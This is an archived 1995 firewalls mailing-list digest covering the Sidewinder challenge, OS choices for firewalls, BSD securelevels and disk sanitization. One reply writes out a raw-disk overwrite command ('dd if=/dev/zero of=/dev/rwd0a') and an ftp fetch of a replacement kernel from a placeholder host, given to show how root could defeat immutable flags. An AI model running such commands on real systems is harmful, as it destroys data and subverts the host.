Trusted Information Systems, Inc. X-Phone: +1 301 854 6889, +1 410 442 1673, FAX: +1 301 854 5363 To: David Kovar Cc: *Hobbit* , firewalls@greatcircle.com Subject: Re: sleazewinder In-Reply-To: Your message of Wed, 09 Aug 95 12:58:41 -0400. <199508091658.MAA02175@nda.nda.com> Date: Wed, 09 Aug 95 15:19:58 -0400 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > > Where is OUR benefit from all the free work that the community at large has > > given you? Well... You can look at it sort of like being a field test site. What are the benefits? I mean, no one pays you to be a field test site for a product. You can figure that the benefits are teh same as if you were a test site: the Sidewinder product gets better and you have a better product to chose from when you go shopping for a firewall. I am not arguing in favor of you buying Sidewinder nor do I want any of this article quoted out of context on their home page. :-) Fred Gauntlet Product Manager, etc. From firewalls-owner Wed Aug 9 13:24:50 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA10863 for firewalls-outgoing; Wed, 9 Aug 1995 12:20:37 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA10792; Wed, 9 Aug 1995 12:20:25 -0700 Received: from comms.crosfield.co.uk(143.136.64.233) by miles via smap (V1.3) id sma010736; Wed Aug 9 12:20:16 1995 Received: from pc2520.tct.crosfield.co.uk (tct.crosfield.co.uk) by crosfield.co.uk (4.1/SMI-4.1) id AA07938; Wed, 9 Aug 95 20:21:48 BST Received: by pc2520.tct.crosfield.co.uk with Microsoft Mail id <30291831@pc2520.tct.crosfield.co.uk>; Wed, 09 Aug 95 20:18:57 gmt From: Pete Anning To: firewalls-owner , lyndond Cc: firewalls Subject: Re: Encripted ftp connections Date: Wed, 09 Aug 95 20:20:00 gmt Message-Id: <30291831@pc2520.tct.crosfield.co.uk> Encoding: 48 TEXT X-Mailer: Microsoft Mail V3.0 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I also need to set up a VPN any info/pointers to discussions or products etc would be very useful. I have just joined the mailing list so I don't have historical discussions from this group. p ---------- >From: firewalls-owner >To: lyndond >Cc: firewalls >Subject: Re: Encripted ftp connections >Date: 07 August 1995 16:29 >from the quill of Lyndon David on scroll ><199508072134.WAA04815@server.sentinet.demon.co.uk> >> Dear All, >> >> I have been tasked with setting up an ftp server to >> communicate with a handfull of business partners. We >> wish to have the ability for our partners to be able >> to send and retrieve files from our server. Due to the >> nature of the data the data must be encripted as it passes >> over the Internet and stong authentication must be used >> when they connect. >You want a VPN (Virtual Private Network). Look through the archives, as >there has been plenty of pointers in the last week to products that do VPN. >As well as lot's of discussion in the past, I'm sure. >> This is a commercial project and the data will cross >> International bounderies, for this reason I do not want >> to use encription technology such as pgp as some of the >> countries will have problems with this. >This is going to bite whether you pre-encrypt, or encrypt in the data >stream. >b. >-- >Brian J. Murrell brian@ilinx.com >InterLinx Support Services, Inc. brian@wimsey.com >North Vancouver, B.C. 604 983 UNIX > Platform and Brand Independent UNIX Support - R3.2 - R4 - BSD From firewalls-owner Wed Aug 9 13:30:18 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA13703 for firewalls-outgoing; Wed, 9 Aug 1995 13:02:30 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA13655 for ; Wed, 9 Aug 1995 13:02:23 -0700 Received: from nu.uac.net(204.249.46.34) by miles via smap (V1.3) id sma013643; Wed Aug 9 13:02:17 1995 Received: (from mike@localhost) by mail1.uac.net (8.6.12/8.6.12) id QAA19028; Wed, 9 Aug 1995 16:01:04 -0400 Date: Wed, 9 Aug 1995 16:01:04 -0400 Message-Id: <199508092001.QAA19028@mail1.uac.net> From: Michael To: kovar@NDA.COM CC: hobbit@avian.org, firewalls@GreatCircle.COM In-reply-to: <199508091658.MAA02175@nda.nda.com> (message from David Kovar on Wed, 9 Aug 1995 12:58:41 -0400 (EDT)) Subject: Re: sleazewinder Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > The only result of this that I've seen so far is at a trade show the > other week. At their booth they were announcing something like: > > Hackers: 0% > Sidewinder: 100% It's interesting that they only chose to use one digit of precision in their results. There was a message in February or March on the mailing list for sidewinder attackers that announced someone did meet the challenge and break into the second machine. They had added some code to telnet, but I don't remember offhand exactly what it did. I suppose though that 1 out of 10000 is 0%; however, it's very misleading, especially if: > Sidewinder stopped every single one of the best hackers efforts! was announced at the booth. --Michael From firewalls-owner Wed Aug 9 13:48:39 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA11924 for firewalls-outgoing; Wed, 9 Aug 1995 12:34:09 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA11858 for ; Wed, 9 Aug 1995 12:33:57 -0700 Received: from eagle.real.com(199.97.122.1) by miles via smap (V1.3) id sma011708; Wed Aug 9 12:33:24 1995 Date: Wed, 9 Aug 1995 19:32:53 GMT From: bret@real.com (Bret McDanel) Received: by real.com (8.6.12/3.2.012693-Realistic Technologies Inc); id TAA05591 for firewalls@greatcircle.com; Wed, 9 Aug 1995 19:32:53 GMT Message-Id: <199508091932.TAA05591@real.com> To: firewalls@greatcircle.com Subject: Re: sleazewinder X-Sun-Charset: US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > > CONCERN 3. Is the Challenge a serious learning tool or a Marketing tactic? > > The answer is both. > > > > The answer so far is "marketing tactic" from the standpoint of "out here on > > the net", unless you intend to do something about it. Where are your RESULTS?? > > Where is OUR benefit from all the free work that the community at large has > > given you? > > The only result of this that I've seen so far is at a trade show the > other week. At their booth they were announcing something like: > > Hackers: 0% > Sidewinder: 100% > > Sidewinder stopped every single one of the best hackers efforts! Not to be picky, but didnt sidewinder stop the hackers best efforts? A big distinciton coiuld be made by the order of the words.. You imply that the best hackers cannot get in, and I do not think that is true, only those that tried (and then how hard did they try?).. Anyway :) From firewalls-owner Wed Aug 9 14:05:03 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA13858 for firewalls-outgoing; Wed, 9 Aug 1995 13:04:33 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA13787 for ; Wed, 9 Aug 1995 13:04:23 -0700 Received: from mercury.sun.com(192.9.25.1) by miles via smap (V1.3) id sma013763; Wed Aug 9 13:04:07 1995 Received: from Eng.Sun.COM by mercury.Sun.COM (Sun.COM) id NAA08929; Wed, 9 Aug 1995 13:02:42 -0700 Received: from olympics.Eng.Sun.COM by Eng.Sun.COM (5.x/SMI-5.3) id AA01002; Wed, 9 Aug 1995 13:02:38 -0700 Received: by olympics.Eng.Sun.COM (SMI-8.6/CRAY-5.1) id MAA00574; Wed, 9 Aug 1995 12:53:17 -0700 Date: Wed, 9 Aug 1995 12:53:17 -0700 From: Brad.Powell@Eng.Sun.COM (Brad Powell) Message-Id: <199508091953.MAA00574@olympics.Eng.Sun.COM> To: firewalls@GreatCircle.COM, gaarder@actech.com Subject: Re: SunOS vs Solaris 2 vs Intel/BSD for firewalls X-Sun-Charset: US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >From firewalls-owner@GreatCircle.COM Wed Aug 9 08:24:41 1995 >Subject: SunOS vs Solaris 2 vs Intel/BSD for firewalls > >I'm planning to build a dual-homed gateway using TIS's toolkit. I have >two choices for hardware platform: a Sparcstation 2 running SunOS 4 or >Solaris 2 or an Intel box running BSD. All of them have gotchas that can be avoided. > BSD has the drawback that I'm >not familiar with it; Don't use anything you are not familure with. BSD *does* have an advantage of having source code available without having to pay for it. Of course the downside is support isn't there. >SunOS 4 has the drawback that source routing is >impossible (or just hard?) to disable; Nonsense. I posted a set of kernel modules to do just this to this list. check out the archives ftp.greatcircle.com:/pub/firewalls/digest. IF you can't find them there try http://all.net. If you can't find them after that then I'll send you ca copy (I'm sure I have it somewhere in the backups) Solaris 2 has relatively few >packages ported to it. this can be a boon as well as a bane since the cracking tools are also not ported (yet) ;^) ======================================================================= Brad Powell : brad.powell@Sun.COM Sr. Network Security Consultant SunNetworks, Sun Microsystems Inc. ======================================================================= The views expressed are those of the author and may not reflect the views of Sun Microsystems Inc. ======================================================================= From firewalls-owner Wed Aug 9 14:06:07 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA14424 for firewalls-outgoing; Wed, 9 Aug 1995 13:18:36 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA14399 for ; Wed, 9 Aug 1995 13:18:32 -0700 Received: from beach.sctc.com(192.55.214.50) by miles via smap (V1.3) id sma014392; Wed Aug 9 13:18:04 1995 Received: from beach.sctc.com (daemon@localhost) by beach.sctc.com (8.6.12/8.6.12) with ESMTP id PAA18594 for ; Wed, 9 Aug 1995 15:23:50 -0500 Received: from spirit.sctc.com (spirit.sctc.com [172.17.192.76]) by beach.sctc.com (8.6.12/8.6.12) with ESMTP id PAA18586 for ; Wed, 9 Aug 1995 15:23:50 -0500 Received: from shade.sctc.com (shade.sctc.com [172.17.192.48]) by spirit.sctc.com (8.6.12/8.6.10) with ESMTP id PAA14140; Wed, 9 Aug 1995 15:16:53 -0500 Received: (from smith@localhost) by shade.sctc.com (8.6.12/8.6.9) id PAA26323; Wed, 9 Aug 1995 15:16:51 -0500 Date: Wed, 9 Aug 1995 15:16:51 -0500 From: Rick Smith Message-Id: <199508092016.PAA26323@shade.sctc.com> To: firewalls@greatcircle.com Cc: smith@sctc.com Subject: Sidewinder challenge comments Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Regarding the posting by Hobbit... >[Referencing dan thomsen's msg from about a week ago, wherein he says...] > As a result we get to learn what kind of attacks people are using > against Unix systems. More importantly this shows that type enforcement > is a useful tool in preventing system compromises. >Yes, and if I remember right, back when the challenge was issued and people >finally figured out what was going on, it was pointed out that if SCTC was >going to let the net test their product for them, they owed the results of >said testing back to the net. I believe someone else from SCTC agreed with >this, claiming that the megabytes of raw log would soon be boiled down into >some sort of useful report. Dan may be replying himself, but in the mean time I'll comment. Short answer: look for Dan's paper on this at CSAC in New Orleans. There really haven't been that many attacks that are interesting from a Firewalls standpoint. To paraphrase the Sidewinder FAQ, about 1% of the attacks are really interesting, and most of those appear to come from BSDI wizards probing our Type Enforcement implementation. Maybe 10% are competent but predictable attacks based on known weaknesses like those published Cheswick & Bellovin. The rest are people who try the easier things mentioned in C&B's "bombs" or in "Unix for Dummies." Rick. smith@sctc.com secure computing corporation From firewalls-owner Wed Aug 9 14:07:08 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA14864 for firewalls-outgoing; Wed, 9 Aug 1995 13:25:46 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA14840 for ; Wed, 9 Aug 1995 13:25:42 -0700 Received: from unknown(132.9.205.2) by miles via smap (V1.3) id sma014737; Wed Aug 9 13:24:54 1995 Received: from cs28-1.ellsworth.af.mil by ns.ellsworth.af.mil with SMTP (5.59/25-eef) id AA01136; Wed, 9 Aug 95 14:26:05 MDT Received: by cs28-1.ellsworth.af.mil with Microsoft Mail id <302925F4@cs28-1.ellsworth.af.mil>; Wed, 09 Aug 95 14:17:40 PDT From: "Tucker, R., SrA, 28CS/SCSNS" To: "'firewalls-owner'" Subject: Sanitizing SCSI HDs Date: Wed, 09 Aug 95 14:17:00 PDT Message-Id: <302925F4@cs28-1.ellsworth.af.mil> Encoding: 83 TEXT X-Mailer: Microsoft Mail V3.0 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Ok folks, I guess it's time to fess up so I can take my foot out of my mouth now. :*) As far as sanitizing SCSI drives using Norton Utilities' Wipedisk. It *IS* still approved for TS, but on MS-DOS systems on ***MILITARY COMPUTERS ONLY.*** If you're a civilian contractor, there are different guidelines you have to follow, and they don't have provisions for clearing TS off of your systems. However, this has nothing to do with hardware and being able to pull information back up from the system, and everything to do with administrative procedures BEFORE you need to sanitize. The sloppy drive head positioning deals with floppy drives, and there is NO WAY, barring destruction, to declassify a floppy disk. However, HD's, unless the head slips (and you would know when it fails) can be declassified in this manner. This includes taking into consideration taking the platters apart, once overwritten enough times, the information is gone. (However, it's also been my past experience that sooner or later, someone will invent something that will nullify this statement, since whenever someone says, "It can't be done." there's always someone doing it.) I know this means there's a double standard between military and civilian requirements, but please don't flame me for it. :*) Part of the problem, is ISM and NISPOM are both Industrial Security program documents. While they DO APPLY, they do not necessarily apply as far as Computer Security is concerned... but you still have to follow them. This is what's known as bureaucracy and politics at work. Industrial Security is governed at the national level by former Security Police (SP) personnel, who haven't got a clue as to computer requirements. (I think it's a prerequisite for running ANY national level program, however, so I'm not trying to flame them.) Since they have no jurisdiction in computer requirements, the only changes they can make to national computer security mandates is to make them more stringent. (You can legally add to a requirement, but you can't make them less stringent without a waiver from the responsible office.) In short, if you're a civilian with classified on your computer, you have to abide by the NISPOM. Government and military personnel get to use the computer security guidelines. < Neah, neah, neah. :*P > Also, Wipedisk is only approved for MS-DOS systems, we have nothing approved for any other system for any level of classified, besides utilizing a sledgehammer and sandpaper. (Which, cost notwithstanding, is very fun... you should try it sometime.) Because the discussion was SCSI, I assumed (along with the results of assuming, with an emphasis on the *me* portion) that everyone was talking about MS-DOS, even knowing that almost all of you are using Unix based systems. (Kind of the equivalent of describing the new Wonder Zap! flea collar at a dog show, and forgetting to mention it only works on cats.) :*( And, last but not least, because I've been shown *VERY* wrong on this one, *DO NOT* degauss a hard drive unless you know, or know someone who knows, what the heck you are doing! This is in regards to zapping your servo info with HD's using voice coil heads. I've spoken to my computer maintenance folks, and they said it's very likely, but they weren't sure (understandable, since we don't normally degauss our HD's.) However, I would like to point out that, I do know someone who has done it, and survived, but he retired and moved recently, so I won't be able to contact him to find out how he did it until this thread is forgotten. I wish I could provide technical details on this one (esp. since this is a technical list) but I'm not too knowledgeable on technical matters (I just play one on TV :*) ) but until I find out how he did it, please don't follow my advice by degaussing your HD. Mr. Lymn has stated that maybe he (my friend who zapped his HD) got lucky, or something, but like I said, unless you know someone who can rebuild HD's from scratch, please don't try this one at home... just in case. So, to stop wasting any more bandwidth than I have to... 1. Wipedisk is ONLY for government and military computers, and only for MS-DOS systems (but it *IS* for TS). 2. Civilians play by a different set of rules (with extra requirements) for the same information. 3. Mr. Lymn is technically knowledgeable, I'm not. Don't degauss your hard drive unless your a masochist. (Or a sadist who hates his/her computer maintenance folks.) Thanks for all the help in pointing out my mistakes, and I apologize for the misinformation I presented in my original post. (No, I'm not being smart... if people don't point out my mistakes, I can't learn. Once learning stops, it's time to take me out back and shoot me.) Thanks, Robert C. Tucker From firewalls-owner Wed Aug 9 14:08:14 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA15911 for firewalls-outgoing; Wed, 9 Aug 1995 13:47:01 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA15876 for ; Wed, 9 Aug 1995 13:46:56 -0700 Received: from eagle.real.com(199.97.122.1) by miles via smap (V1.3) id sma015862; Wed Aug 9 13:46:08 1995 Received: from eagle by real.com (8.6.12/3.2.012693-Realistic Technologies Inc) via SMTP; id UAA05832 for ; Wed, 9 Aug 1995 20:45:50 GMT Message-Id: <199508092045.UAA05832@real.com> Date: Wed, 09 Aug 95 16:45:51 -0400 From: Fred Flintstone X-Mailer: Mozilla 1.1N (X11; I; SunOS 5.3 sun4c) MIME-Version: 1.0 To: firewalls@greatcircle.com Subject: Re: sleazewinder Sender: firewalls-owner@GreatCircle.COM Precedence: bulk X-URL: file:/home/bret/bret.html Content-Transfer-Encoding: 7bit Content-Type: text/plain; charset=us-ascii > > > Sidewinder stopped every single one of the best hackers efforts! > > was announced at the booth. > > > --Michael > I think that they were refering to DEFCON only.. And there was more than the person that did stuff with the telnet code (actually it worked on any socket operation if I remember, but that was fixed that day).. From firewalls-owner Wed Aug 9 15:05:34 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA18493 for firewalls-outgoing; Wed, 9 Aug 1995 14:51:25 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA18431 for ; Wed, 9 Aug 1995 14:51:16 -0700 From: long-morrow@CS.YALE.EDU Received: from rt-gw.cs.yale.edu(128.36.0.13) by miles via smap (V1.3) id sma018418; Wed Aug 9 14:51:00 1995 Received: from SPARKY.CF.CS.YALE.EDU by ALABAMA.CF.CS.YALE.EDU via ESMTP; Wed, 9 Aug 1995 17:49:26 -0400 Received: by SPARKY.CF.CS.YALE.EDU (Sendmail-8.6.12/res.client.cf-3.7) id RAA04230; Wed, 9 Aug 1995 17:49:21 -0400 Date: Wed, 9 Aug 1995 17:49:21 -0400 Message-Id: <199508092149.RAA04230@SPARKY.CF.CS.YALE.EDU> To: kovar@NDA.COM, mike@uac.net Subject: Re: sleazewinder Cc: firewalls@GreatCircle.COM, hobbit@avian.org Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Michael - There has never been a message about anyone breaking into the target LAN via by the Sidewinder demo Internet gateway machine on the Sneakers mailing list. I checked all of the messages on the Sneakers mailing list (a independent and full disclosure list where you can talk about testing breaking into Sidewinder -- and other network security defenses if you wish - and there was no such message in the archives (it wasn't hard to check the archives since the list is fairly low traffic). You may have heard that 'root' was broken on the Sidewinder demo machine -- and SCTC freely admit that that has happened...but breaking 'root' on their Type Enforcement machine doesn't give you access to the internal network protected by the Sidewinder machine. Disclaimer: I am not associated with SCTC or the Sidewinder product. I just maintain an independent e-mailing list (called Sneakers) for people who want/need to audit/test/break-into firewalls (for legitimate reasons). - Morrow Michael wrote: >It's interesting that they only chose to use one digit of precision in >their results. There was a message in February or March on the mailing >list for sidewinder attackers that announced someone did meet the >challenge and break into the second machine. They had added some code >to telnet, but I don't remember offhand exactly what it did. I suppose >though that 1 out of 10000 is 0%; however, it's very misleading, >especially if: > >> Sidewinder stopped every single one of the best hackers efforts! > >was announced at the booth. > > > --Michael From firewalls-owner Wed Aug 9 15:30:23 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA20550 for firewalls-outgoing; Wed, 9 Aug 1995 15:25:06 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA20527 for ; Wed, 9 Aug 1995 15:25:02 -0700 Received: from abel.cc.sunysb.edu(129.49.2.201) by miles via smap (V1.3) id sma020522; Wed Aug 9 15:24:57 1995 Received: from libws4.ic.sunysb.edu (libws4 [129.49.12.89]) by abel.ic.sunysb.edu (8.6.12/8.6.12) with ESMTP id SAA19590; Wed, 9 Aug 1995 18:10:39 -0400 Received: (sylhwang@localhost) by libws4.ic.sunysb.edu (8.6.9/8.6.9) id SAA13069; Wed, 9 Aug 1995 18:16:15 -0400 Date: Wed, 9 Aug 1995 18:16:13 -0400 (EDT) From: Atreides To: Doug Hughes cc: dannyc@gmap.leeds.ac.uk, firewalls@GreatCircle.COM Subject: Re: klaxon In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Tue, 8 Aug 1995, Doug Hughes wrote: > > It sends out messages at auth.notice. Your syslog.conf should use > this facility.level to do what you want with them. You can also change > it easily in the source in two places. (where it says LOG_AUTH|LOG_NOTICE) > If you have any more usage questions, you're probably best off asking > me directly, since usage of it is not yet what you would call wide-spread. :) > Excuse me, but could you tell me what programs you are talking about? From firewalls-owner Wed Aug 9 16:00:33 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA17936 for firewalls-outgoing; Wed, 9 Aug 1995 14:33:19 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA17913 for ; Wed, 9 Aug 1995 14:33:14 -0700 Received: from beach.sctc.com(192.55.214.50) by miles via smap (V1.3) id sma017906; Wed Aug 9 14:32:27 1995 Received: from beach.sctc.com (daemon@localhost) by beach.sctc.com (8.6.12/8.6.12) with ESMTP id QAA21588 for ; Wed, 9 Aug 1995 16:38:17 -0500 Received: from spirit.sctc.com (spirit.sctc.com [172.17.192.76]) by beach.sctc.com (8.6.12/8.6.12) with ESMTP id QAA21584 for ; Wed, 9 Aug 1995 16:38:16 -0500 Received: from shade.sctc.com (shade.sctc.com [172.17.192.48]) by spirit.sctc.com (8.6.12/8.6.10) with ESMTP id QAA16409; Wed, 9 Aug 1995 16:31:19 -0500 Received: (from smith@localhost) by shade.sctc.com (8.6.12/8.6.9) id QAA05680; Wed, 9 Aug 1995 16:31:17 -0500 Date: Wed, 9 Aug 1995 16:31:17 -0500 From: Rick Smith Message-Id: <199508092131.QAA05680@shade.sctc.com> To: firewalls@greatcircle.com Cc: smith@sctc.com Subject: Re: s[id]ewinder Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Michael writes: >... There was a message in February or March on the mailing >list for sidewinder attackers that announced someone did meet the >challenge and break into the second machine. They had added some code >to telnet, but I don't remember offhand exactly what it did. This is the weird part about having a challenge site. There are almost as many rumors of successful attacks as there are unsuccessful attacks (thousands, it would seem). I don't remember seeing any messages about this attack. I follow "sneakers" pretty closely, and that's the only mailing list I know of about challenge site attacks. If anyone has a copy of such a message I'd love to see it. The Challenge is to break through the firewall and extract a message stored on the challenge site's LAN. I've never seen anyone broadcast a copy of the message, so I doubt anyone has really managed to reach it. We do hear third hand reports of "consultants" and sales droids who claim to have broken Sidewinder so they can sell some snake oil. We *did* give out a jacket once to someone who did something truly inspired (used mknod to construct an alternative path to the disk drive) even though the guy didn't reach the internal net. Of course, we fixed that bug. It's written up in Dan's paper for the next CSAC. Rick. smith@sctc.com secure computing corporation From firewalls-owner Wed Aug 9 16:20:29 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA21040 for firewalls-outgoing; Wed, 9 Aug 1995 15:42:05 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA21025 for ; Wed, 9 Aug 1995 15:42:02 -0700 Received: from citecuh.citec.qld.gov.au(203.5.10.10) by miles via smap (V1.3) id sma021007; Wed Aug 9 15:41:22 1995 Received: (from mail@localhost) by citecuh.citec.qld.gov.au (8.6.10/8.6.10) id IAA05783; Thu, 10 Aug 1995 08:35:45 +1000 Received: from citecub.citec.qld.gov.au(131.242.4.98) by citecuh.citec.qld.gov.au via smap (V1.3) id /mail/incoming/sma005781; Thu Aug 10 08:35:31 1995 Received: by citecub.citec.qld.gov.au (5.0/SMI-SVR4) id AA13799; Thu, 10 Aug 1995 08:40:27 +1000 From: sgcccdc@citec.qld.gov.au (Colin Campbell) Message-Id: <9508092240.AA13799@citecub.citec.qld.gov.au> Subject: Re: SunOS vs Solaris 2 vs Intel/BSD for firewalls To: gaarder@actech.com (Steve Gaarder) Date: Thu, 10 Aug 95 8:40:27 EST Cc: firewalls@GreatCircle.COM In-Reply-To: <8k_AHFr6_EEC0YCrk0@ovid>; from "Steve Gaarder" at Aug 9, 95 10:23 am X-Mailer: ELM [version 2.3 PL11] content-length: 1687 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi, You forgot BSD on SPARC :-). I have done SunOS/SPARC and BSDI/Intel (80585.99999:-). Of the two, I guess I would have to opt for BSDI (SPARC or Intel) because of the extra security features: 0. run states The machine is in one of three run states which are more or less security levels. The higher the state the more the security. Levels can only be increased without rebooting to a lower level. 1. the immutability of devices in certain run states Disk drives become unwritable other than through the filesystem (ie no write to /dev/rsdxx). 2. the `chflags' command which sets low level protection that overrides the Unix standard chmod type protection. For example: files can be made - read only - they cannot be changed, even by root, while the machine is in a high run level (regardless of permissions) append only (great for log files) Sounds to me like all good things for a firewall. Oh yeah, you can also get source and turn off all the nasty things you want, like IP-FORWARDING and IP-SOURCE-ROUTING. Colin > > I'm planning to build a dual-homed gateway using TIS's toolkit. I have > two choices for hardware platform: a Sparcstation 2 running SunOS 4 or > Solaris 2 or an Intel box running BSD. BSD has the drawback that I'm > not familiar with it; SunOS 4 has the drawback that source routing is > impossible (or just hard?) to disable; Solaris 2 has relatively few > packages ported to it. > > Which do you think is best for this application? > > thanks, > > Steven Gaarder Network and Systems Administrator > gaarder@actech.com A C Technology, Ithaca, N.Y., USA > From firewalls-owner Wed Aug 9 16:30:20 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA24084 for firewalls-outgoing; Wed, 9 Aug 1995 16:28:21 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA23996 for ; Wed, 9 Aug 1995 16:28:08 -0700 Message-Id: <199508092328.QAA23996@miles.greatcircle.com> Received: from ken.canbtimes.com.au(203.5.63.1) by miles via smap (V1.3) id sma023972; Wed Aug 9 16:27:38 1995 Received: by ken.canbtimes.com.au (1.37.109.11/16.2) id AA234520728; Thu, 10 Aug 1995 09:25:28 +1000 From: John Cougar Subject: Sample Security Policy? To: snd1pmf@snd10.med.navy.mil Date: Thu, 10 Aug 95 9:25:27 EST Cc: firewalls@GreatCircle.com Mailer: Elm [revision: 70.85.2.1] Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hey Pat give away a copy of an organisations Security Policy?!? Not only must you be kidding, but also: fat chance. That'd be as negligent as giving away company trade secrets! You can, however, get more than enough info. from the RFC 1244, available at any number of archives. Try an archie server near you someplace. You'll also want copies of the DoD Orange Book, and Cheswick and Bellovin's "Firewalls and Internet Security - repelling the wily hacker". The latter will cost you - ISBN: 0-201-63357-4. The RFC 1244 (circa 1991) is entitled "The Site Security Handbook" and is edited by Holbrook and Reynolds. -- ---------------------------------------------------------------------- John Cougar | email: johnc@canbtimes.com.au Systems Consultant | voice: ++ 61 6 280 2128 Australian Technology Resources | mobile: ++ 61 018 488867 | fax: ++ 61 6 280 5420 ---------------------------------------------------------------------- "Modern" - what an archaic term ... From firewalls-owner Wed Aug 9 17:01:11 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA23104 for firewalls-outgoing; Wed, 9 Aug 1995 16:16:50 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA23022 for ; Wed, 9 Aug 1995 16:16:37 -0700 Received: from milkyway.com(198.53.167.2) by miles via smap (V1.3) id smaa22998; Wed Aug 9 16:15:51 1995 Received: from jupiter.milkyway.com (jupiter.milkyway.com [192.168.77.9]) by internet with ESMTP (DuhMail/2.0) id TAB06400; Wed, 9 Aug 1995 19:16:29 -0400 Received: from metis.milkyway.com (mcr@metis.milkyway.com [192.168.77.21]) by jupiter.milkyway.com (8.6.12/8.6.12) with ESMTP id TAA28508 for ; Wed, 9 Aug 1995 19:11:40 -0400 Received: by metis.milkyway.com (8.6.9/BSDI-Client) id TAA02110; Wed, 9 Aug 1995 19:23:47 -0400 To: firewalls@GreatCircle.COM Path: not-for-mail From: mcr@milkyway.com (Michael Richardson) Newsgroups: milkyway.mail.firewalls Subject: Re: SunOS vs Solaris 2 vs Intel/BSD for firewalls Date: 9 Aug 1995 19:23:46 -0400 Organization: Milkyway Networks Corporation, Ottawa, ON Lines: 31 Distribution: milkyway Message-ID: <40bg22$21s@metis.milkyway.com> References: <8k_AHFr6_EEC0YCrk0@ovid> <9508091811.AA19205@cseic.saic.com> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk In article <9508091811.AA19205@cseic.saic.com>, Stephen Harold Goldstein wrote: > 1) Its chflags command which can set files as append-only (sappnd) or > "immutable" (schg). With these additional features prudently > applied to critical files, even if root were compromised, the intruder > would be unable to (a) erase any logs that tracked his actions (b) > replace things like /bin/login with a hacked version, etc. Uh... dd if=/dev/zero of=/dev/rwd0a Or... ftp foo.bar cd / get bsd quit reboot > least two reasonably respected commercial firewalls - TIS and > Borderware (though I believe each has performed their own "hardening" As well as Black Hole. >Anyone know of a way an intruder might induce "insecure" mode while in >multi-user mode? Only pid=1 can change the security mode, and stock /sbin/init only does that in "single user mode" -- :!mcr!: | Milkyway Networks Corporation Michael Richardson | Makers of the Black Hole firewall NCF: aa714 || xx714 | +1 613 566-4574 ... mcr@milkyway.com Home: mcr@sandelman.ocunix.on.ca. PGP key available. From firewalls-owner Wed Aug 9 17:22:27 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA22436 for firewalls-outgoing; Wed, 9 Aug 1995 16:08:31 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA22383 for ; Wed, 9 Aug 1995 16:08:21 -0700 Received: from milkyway.com(198.53.167.2) by miles via smap (V1.3) id sma022333; Wed Aug 9 16:07:55 1995 Received: from jupiter.milkyway.com (jupiter.milkyway.com [192.168.77.9]) by internet with ESMTP (DuhMail/2.0) id TAA06380; Wed, 9 Aug 1995 19:08:28 -0400 Received: from metis.milkyway.com (mcr@metis.milkyway.com [192.168.77.21]) by jupiter.milkyway.com (8.6.12/8.6.12) with ESMTP id TAA28448 for ; Wed, 9 Aug 1995 19:04:35 -0400 Received: by metis.milkyway.com (8.6.9/BSDI-Client) id TAA02042; Wed, 9 Aug 1995 19:16:42 -0400 To: firewalls@greatcircle.com Path: not-for-mail From: mcr@milkyway.com (Michael Richardson) Newsgroups: milkyway.mail.firewalls Subject: Re: Multilevel Security is good for firewalls Date: 9 Aug 1995 19:16:39 -0400 Organization: Milkyway Networks Corporation, Ottawa, ON Lines: 42 Distribution: milkyway Message-ID: <40bfkn$1vo@metis.milkyway.com> References: <9508082241.AA10124@ig1.att.att.com> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk In article <9508082241.AA10124@ig1.att.att.com>, wrote: >So B1 is a great addition for protecting the firewall itself from >attack. 